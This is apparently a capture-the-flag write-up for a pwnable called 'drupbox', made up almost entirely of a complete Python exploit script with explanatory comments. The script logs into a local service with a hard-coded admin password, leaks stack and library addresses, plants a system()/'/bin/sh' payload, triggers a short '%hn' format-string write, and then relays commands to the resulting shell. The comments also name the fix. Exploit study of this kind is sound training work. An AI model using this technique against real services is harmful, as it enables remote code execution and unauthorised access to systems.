Overview
Category : Pwnables
File : drupbox
Summary : make chdir() fail, obtain the admin password, then use a 13-byte format string bug (FSB)
Exploit
#!/usr/bin/python
from socket import *
from struct import pack,unpack
# Helper: pack an integer as a 32-bit little-endian unsigned value ("<L").
p = lambda x:pack("<L",x)
# Plain TCP connection to the service under test; the target is a local
# instance listening on port 8887.
s = socket(AF_INET,SOCK_STREAM)
s.connect(("localhost",8887))
# Block until Enter is pressed before any traffic is exchanged
# (presumably to leave time to attach a debugger to the service -- confirm).
raw_input()
# NOTE(review): every recv(1024) in this script assumes a complete prompt
# arrives in one read. TCP does not guarantee that, so the dialogue below
# depends on timing.
print s.recv(1024)
# Menu choice "1", followed by a username and a password. The summary lists
# "get admin password" as an earlier step; how the credential was recovered
# is not shown in this script.
s.send("1\n")
print s.recv(1024)
s.send("admin\n")
print s.recv(1024)
s.send("y0uC4nn0tgu355th1sp4ssw0rd!#@#!@!$!#@\n")
print s.recv(1024)
# Menu choice "2", followed by the 4-byte marker "XXXX". One reply chunk is
# printed here; the chunk read immediately afterwards is the one parsed for
# addresses.
s.send("2\n")
print s.recv(1024)
s.send("XXXX\n")
print s.recv(1024)
# d is the next chunk of the service's reply. Bytes 4-8, 8-12 and 32-36 are
# read as little-endian 32-bit values and each is adjusted by a fixed
# constant. Judging by the variable names they are leaked pointers into the
# stack, a shared library and the main binary -- confirm against the target.
# The constants are tied to one specific build of the binary and its
# library; they do not carry over to any other build.
d = s.recv(1024)
stack = unpack("<L",d[4:8])[0]+0xa4
lib = unpack("<L",d[8:12])[0] - 0x39ac4e + 0xe000
code = unpack("<L",d[32:36])[0] - 0x1197
print hex(code)
# Addresses derived from the values above. system_addr is presumably
# system() inside the library; system_arg is presumably where the "/bin/sh"
# string sent later ends up on the stack -- both to be confirmed.
system_addr = lib+0x41260
system_arg = stack - 0x38e
# read_plt and pppr are computed but never used in the rest of this script.
read_plt = code + 0xbd0
pppr = code + 0xf47
print hex(stack)
print hex(lib)
# Second pause so the printed addresses can be checked before continuing.
raw_input(">value")
# num is the field width used in the "%<num>c" directive sent further down,
# i.e. the number of padding characters printed before "%12$hn" stores the
# output count. Arithmetically it is the low 16 bits of `stack`, minus 4,
# minus 926. Why those two adjustments are needed is not visible in this
# script -- TODO confirm against the binary's stack layout.
num = ((stack&0x0000ffff) - 4)-926
# 12-byte block: system_addr, four filler bytes, system_arg.
payload = ""
payload += p(system_addr)
payload += "aaaa"
payload += p(system_arg)
# Menu choices "4" then "1", then a username field consisting of "admin",
# a NUL byte, the 12-byte block, four more NUL bytes and "/bin/sh".
# Presumably the service compares the name as a C string, so it still sees
# "admin" while the trailing bytes stay in its buffer -- confirm.
s.send("4\n")
s.recv(1024)
s.send("1\n")
s.recv(1024)
s.send("admin\x00"+payload+"\x00\x00\x00\x00/bin/sh\n")
s.recv(1024)
s.send("y0uC4nn0tgu355th1sp4ssw0rd!#@#!@!$!#@\n")
s.recv(1024)
# Menu choice "5", then the short format string the summary calls the
# "13byte fsb". "%hn" stores a 16-bit character count through the 12th
# variadic argument. That can only happen if the service hands client text
# to a printf-family function as the format argument. Passing the text as
# data (a constant "%s" format) removes the write. Building with glibc
# _FORTIFY_SOURCE=2 also rejects %n in a writable format string.
s.send("5\n")
s.recv(1024)
s.send("%"+str(num)+"c%12$hn")
# Final pause, then discard one reply chunk.
raw_input(">")
s.recv(1024)
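# Interactive relay: send each line typed locally to the service and print
# one reply chunk, until "exit" is entered.
# The page shows these lines flattened to column 0, which is not valid
# Python; the nesting below is restored from the control flow.
while 1:
    comm = raw_input("$")
    if comm == "exit":
        break
    s.send(comm+"\n")
    print s.recv(1024)
# Release the connection once the relay loop ends.
s.close()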